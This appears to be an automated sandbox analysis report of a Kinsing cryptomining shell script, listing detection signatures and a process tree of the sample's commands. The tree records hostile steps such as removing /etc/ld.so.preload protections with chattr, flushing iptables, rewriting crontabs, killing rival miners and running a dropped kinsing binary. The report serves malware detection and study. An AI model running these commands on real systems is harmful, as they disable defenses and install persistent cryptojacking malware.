Analysis
-
max time kernel
100s -
max time network
120s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
24/02/2025, 03:51
Static task
static1
Behavioral task
behavioral1
Sample
ece8ca0be686a214bd04f395150a06cc5b6312275daed8aab74bbe96d45bd253.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ece8ca0be686a214bd04f395150a06cc5b6312275daed8aab74bbe96d45bd253.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ece8ca0be686a214bd04f395150a06cc5b6312275daed8aab74bbe96d45bd253.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
ece8ca0be686a214bd04f395150a06cc5b6312275daed8aab74bbe96d45bd253.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
ece8ca0be686a214bd04f395150a06cc5b6312275daed8aab74bbe96d45bd253.sh
-
Size
564B
-
MD5
9329ab381df2adee0565f7b4aa4a7503
-
SHA1
94f01de282218339136c57ea31734fe045f42a69
-
SHA256
ece8ca0be686a214bd04f395150a06cc5b6312275daed8aab74bbe96d45bd253
-
SHA512
058729bf8b0195f03b19cd5025e69f3dbd22e088d9108103571a84870073b00c782ff9d35e82d9253bad266c93a5aae147807a08ca1d66a94fa8a0883a805156
Malware Config
Signatures
-
Kinsing Rootkit
Rootkit reuses the publicly available BEURK rootkit.
-
Kinsing Rootkit payload 1 IoCs
resource yara_rule behavioral3/files/fstream-31.dat family_elf_kinsing_rootkit -
Kinsing family
-
Kinsing payload 1 IoCs
resource yara_rule behavioral3/files/fstream-30.dat family_elf_kinsing_loader -
Kinsing_rootkit family
-
Modifies the dynamic linker configuration file 2 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
description ioc Process File opened for modification /etc/ld.so.preload bash -
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1753 chmod 1758 chmod 1760 chmod 1766 chmod 1767 chmod 1740 chmod 1742 chmod 1751 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /etc/data/kinsing 1768 bash -
Flushes firewall rules 1 TTPs 2 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 758 iptables 719 iptables -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 2 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 739 sudo 1488 sudo -
Attempts to change immutable files 53 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 1598 xargs 1604 xargs 1643 sed 1648 xargs 1649 sed 1657 xargs 1670 sed 1497 uname 1557 xargs 1567 xargs 1645 xargs 1651 xargs 1652 sed 1678 xargs 1718 xargs 754 chattr 1526 xargs 1536 xargs 1562 xargs 1610 xargs 1646 sed 713 chattr 1547 xargs 1642 xargs 1655 sed 1658 sed 1729 xargs 752 chattr 756 chattr 1552 xargs 1654 xargs 1660 xargs 1667 sed 1676 sed 1690 xargs 1542 xargs 1664 sed 1666 xargs 1672 xargs 1673 sed 1695 xargs 1707 xargs 716 chattr 1586 xargs 1592 xargs 1669 xargs 1675 xargs 705 chattr 1531 xargs 1574 xargs 1579 xargs 1734 xargs 1521 xargs -
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.aGDKqj crontab File opened for modification /var/spool/cron/crontabs/tmp.1ypMHg crontab File opened for modification /var/spool/cron/crontabs/tmp.lD7SyB crontab File opened for modification /var/spool/cron/crontabs/tmp.Z2yoLe crontab File opened for modification /var/spool/cron/crontabs/tmp.mnWoIp crontab File opened for modification /var/spool/cron/crontabs/tmp.dRa9Wg crontab File opened for modification /var/spool/cron/crontabs/tmp.OVVOl5 crontab File opened for modification /var/spool/cron/crontabs/tmp.rwnWVg crontab File opened for modification /var/spool/cron/crontabs/tmp.lSgWgB crontab File opened for modification /var/spool/cron/crontabs/tmp.HqZri3 crontab File opened for modification /var/spool/cron/crontabs/tmp.Bg38cG crontab File opened for modification /var/spool/cron/crontabs/tmp.Zjvjj8 crontab File opened for modification /var/spool/cron/crontabs/tmp.yk8wsL crontab File opened for modification /var/spool/cron/crontabs/tmp.raUZgL crontab File opened for modification /var/spool/cron/crontabs/tmp.YKGE6I crontab File opened for modification /var/spool/cron/crontabs/tmp.pQ73Xh crontab File opened for modification /var/spool/cron/crontabs/tmp.OFRdhO crontab File opened for modification /var/spool/cron/crontabs/tmp.qPH0WQ crontab File opened for modification /var/spool/cron/crontabs/tmp.gEgBKs crontab File opened for modification /var/spool/cron/crontabs/tmp.7Ym680 crontab File opened for modification /var/spool/cron/crontabs/tmp.HNUkrk crontab File opened for modification /var/spool/cron/crontabs/tmp.itUew3 crontab File opened for modification /var/spool/cron/crontabs/tmp.DYdWBF crontab File opened for modification /var/spool/cron/crontabs/tmp.yJZ0ic crontab File opened for modification /var/spool/cron/crontabs/tmp.81HOiV crontab File opened for modification /var/spool/cron/crontabs/tmp.KtwgPT crontab File opened for modification /var/spool/cron/crontabs/tmp.TcqBCk crontab File opened for modification /var/spool/cron/crontabs/tmp.drxHLe crontab File opened for modification /var/spool/cron/crontabs/tmp.5mQ8lA crontab File opened for modification /var/spool/cron/crontabs/tmp.oOMwZ8 crontab File opened for modification /var/spool/cron/crontabs/tmp.xvh1eX crontab File opened for modification /var/spool/cron/crontabs/tmp.86ejpK crontab File opened for modification /var/spool/cron/crontabs/tmp.LlOx6V crontab File opened for modification /var/spool/cron/crontabs/tmp.8fCj63 crontab File opened for modification /var/spool/cron/crontabs/tmp.0qqZ4p crontab File opened for modification /var/spool/cron/crontabs/tmp.VfnVGc crontab File opened for modification /var/spool/cron/crontabs/tmp.Ubi0mV crontab File opened for modification /var/spool/cron/crontabs/tmp.egG6zr crontab File opened for modification /var/spool/cron/crontabs/tmp.qV50xU crontab File opened for modification /var/spool/cron/crontabs/tmp.AJo0gb crontab File opened for modification /var/spool/cron/crontabs/tmp.rp7C9z crontab File opened for modification /var/spool/cron/crontabs/tmp.bHiGH6 crontab File opened for modification /var/spool/cron/crontabs/tmp.XvLu9r crontab File opened for modification /var/spool/cron/crontabs/tmp.8ImYre crontab File opened for modification /var/spool/cron/crontabs/tmp.cJcKFq crontab File opened for modification /var/spool/cron/crontabs/tmp.7jUHdW crontab File opened for modification /var/spool/cron/crontabs/tmp.5xuvLm crontab File opened for modification /var/spool/cron/crontabs/tmp.VAgx6v crontab File opened for modification /var/spool/cron/crontabs/tmp.EViPV2 crontab File opened for modification /var/spool/cron/crontabs/tmp.5VSf1P crontab File opened for modification /var/spool/cron/crontabs/tmp.eP9p3b crontab File opened for modification /var/spool/cron/crontabs/tmp.qwOAuu crontab File opened for modification /var/spool/cron/crontabs/tmp.GDeloA crontab File opened for modification /var/spool/cron/crontabs/tmp.04t7Jw crontab File opened for modification /var/spool/cron/crontabs/tmp.4TwBX4 crontab File opened for modification /var/spool/cron/crontabs/tmp.WWkXSf crontab File opened for modification /var/spool/cron/crontabs/tmp.XAguvb crontab File opened for modification /var/spool/cron/crontabs/tmp.OxkstL crontab File opened for modification /var/spool/cron/crontabs/tmp.Fp5Rou crontab File opened for modification /var/spool/cron/crontabs/tmp.PDLi2d crontab File opened for modification /var/spool/cron/crontabs/tmp.dQtf6e crontab File opened for modification /var/spool/cron/crontabs/tmp.ajNOjy crontab File opened for modification /var/spool/cron/crontabs/tmp.HxvxvO crontab File opened for modification /var/spool/cron/crontabs/tmp.NPaVTx crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /lib/systemd/system/bot.service bash -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
Process Discovery 1 TTPs 12 IoCs
Adversaries may try to discover information about running processes.
pid Process 1691 ps 1538 ps 1558 ps 1563 ps 1575 ps 1638 ps 1730 ps 1543 ps 1548 ps 1553 ps 1570 ps 1686 ps -
description ioc Process File opened for reading /proc/sys/kernel/pid_max ps File opened for reading /proc/6/cmdline pkill File opened for reading /proc/20/cmdline ps File opened for reading /proc/1/status ps File opened for reading /proc/82/cmdline pkill File opened for reading /proc/filesystems ls File opened for reading /proc/241/status pkill File opened for reading /proc/77/status pkill File opened for reading /proc/76/cmdline pkill File opened for reading /proc/739/cmdline pkill File opened for reading /proc/9/cmdline pkill File opened for reading /proc/171/status pkill File opened for reading /proc/11/status pkill File opened for reading /proc/15/status pkill File opened for reading /proc/326/stat ps File opened for reading /proc/20/cmdline ps File opened for reading /proc/2/stat ps File opened for reading /proc/8/status pkill File opened for reading /proc/674/cmdline pkill File opened for reading /proc/5/status pkill File opened for reading /proc/699/status ps File opened for reading /proc/707/cmdline pkill File opened for reading /proc/78/status pkill File opened for reading /proc/77/cmdline pkill File opened for reading /proc/374/cmdline pkill File opened for reading /proc/15/cmdline ps File opened for reading /proc/74/status ps File opened for reading /proc/9/stat ps File opened for reading /proc/374/status ps File opened for reading /proc/9/status ps File opened for reading /proc/37/status pkill File opened for reading /proc/meminfo ps File opened for reading /proc/14/cmdline pkill File opened for reading /proc/16/cmdline pkill File opened for reading /proc/119/status pkill File opened for reading /proc/6/cmdline pkill File opened for reading /proc/679/stat ps File opened for reading /proc/707/cmdline pkill File opened for reading /proc/8/cmdline pkill File opened for reading /proc/13/cmdline pkill File opened for reading /proc/3/cmdline pkill File opened for reading /proc/7/status ps File opened for reading /proc/120/cmdline pkill File opened for reading /proc/3/cmdline ps File opened for reading /proc/699/stat ps File opened for reading /proc/76/status pkill File opened for reading /proc/24/status pkill File opened for reading /proc/376/status pkill File opened for reading /proc/filesystems crontab File opened for reading /proc/filesystems crontab File opened for reading /proc/10/cmdline pkill File opened for reading /proc/75/status pkill File opened for reading /proc/14/stat ps File opened for reading /proc/707/cmdline ps File opened for reading /proc/18/status pkill File opened for reading /proc/81/cmdline pkill File opened for reading /proc/414/cmdline pkill File opened for reading /proc/374/cmdline pkill File opened for reading /proc/668/status pkill File opened for reading /proc/241/cmdline ps File opened for reading /proc/71/cmdline ps File opened for reading /proc/81/stat ps File opened for reading /proc/5/cmdline pkill File opened for reading /proc/18/cmdline pkill -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1443 ls 1873 sed
Processes
-
/tmp/ece8ca0be686a214bd04f395150a06cc5b6312275daed8aab74bbe96d45bd253.sh/tmp/ece8ca0be686a214bd04f395150a06cc5b6312275daed8aab74bbe96d45bd253.sh1⤵PID:702
-
/usr/bin/chattrchattr -i /etc/ld.so.preload2⤵
- Attempts to change immutable files
PID:705
-
-
/bin/rmrm -f /etc/ld.so.preload2⤵PID:709
-
-
/usr/bin/chattrchattr -R -i /var/spool/cron2⤵
- Attempts to change immutable files
PID:713
-
-
/usr/bin/chattrchattr -i /etc/crontab2⤵
- Attempts to change immutable files
PID:716
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:719
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:727
-
-
/usr/bin/crontabcrontab -l2⤵PID:725
-
-
/bin/sedsed /185.81.68.124/d2⤵PID:726
-
-
/usr/bin/pkillpkill -f kinsing2⤵
- Reads CPU attributes
PID:733
-
-
/usr/bin/pkillpkill -f kdevtmpfsi2⤵
- Reads CPU attributes
- Reads runtime system information
PID:735
-
-
/bin/rmrm -rf /tmp/kdevtmpfsi2⤵PID:737
-
-
/usr/bin/sudosudo bash2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:739 -
/usr/sbin/sendmailsendmail -t3⤵PID:746
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmOYp-0000C2-H24⤵
- Reads CPU attributes
PID:762
-
-
-
/usr/sbin/sendmailsendmail -t3⤵PID:749
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmOYp-0000C5-Eb4⤵PID:763
-
-
-
/bin/bashbash3⤵
- Modifies the dynamic linker configuration file
- Executes dropped EXE
- Modifies systemd
PID:751 -
/usr/bin/chattrchattr -i /etc/ld.so.preload4⤵
- Attempts to change immutable files
PID:752
-
-
/bin/rmrm -f /etc/ld.so.preload4⤵PID:753
-
-
/usr/bin/chattrchattr -R -ia /var/spool/cron4⤵
- Attempts to change immutable files
PID:754
-
-
/usr/bin/chattrchattr -ia /etc/crontab4⤵
- Attempts to change immutable files
PID:756
-
-
/sbin/iptablesiptables -F4⤵
- Flushes firewall rules
PID:758
-
-
/bin/grepgrep exe4⤵PID:761
-
-
/bin/lsls -latrh /proc/14⤵PID:760
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:766
-
-
/bin/grepgrep exe4⤵PID:769
-
-
/bin/lsls -latrh /proc/104⤵PID:768
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:771
-
-
/bin/grepgrep exe4⤵PID:774
-
-
/bin/lsls -latrh /proc/114⤵PID:773
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:776
-
-
/bin/grepgrep exe4⤵PID:781
-
-
/bin/lsls -latrh /proc/1114⤵PID:780
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:783
-
-
/bin/grepgrep exe4⤵PID:786
-
-
/bin/lsls -latrh /proc/1194⤵PID:785
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:788
-
-
/bin/grepgrep exe4⤵PID:791
-
-
/bin/lsls -latrh /proc/124⤵PID:790
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:793
-
-
/bin/grepgrep exe4⤵PID:796
-
-
/bin/lsls -latrh /proc/1204⤵PID:795
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:798
-
-
/bin/grepgrep exe4⤵PID:801
-
-
/bin/lsls -latrh /proc/134⤵PID:800
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:803
-
-
/bin/grepgrep exe4⤵PID:806
-
-
/bin/lsls -latrh /proc/144⤵PID:805
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:808
-
-
/bin/grepgrep exe4⤵PID:811
-
-
/bin/lsls -latrh /proc/1484⤵PID:810
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:813
-
-
/bin/grepgrep exe4⤵PID:816
-
-
/bin/lsls -latrh /proc/154⤵PID:815
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:818
-
-
/bin/grepgrep exe4⤵PID:821
-
-
/bin/lsls -latrh /proc/1544⤵PID:820
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:823
-
-
/bin/grepgrep exe4⤵PID:826
-
-
/bin/lsls -latrh /proc/164⤵PID:825
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:828
-
-
/bin/grepgrep exe4⤵PID:831
-
-
/bin/lsls -latrh /proc/174⤵PID:830
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:833
-
-
/bin/grepgrep exe4⤵PID:836
-
-
/bin/lsls -latrh /proc/1714⤵PID:835
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:838
-
-
/bin/grepgrep exe4⤵PID:841
-
-
/bin/lsls -latrh /proc/184⤵PID:840
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:843
-
-
/bin/grepgrep exe4⤵PID:846
-
-
/bin/lsls -latrh /proc/194⤵PID:845
-
-
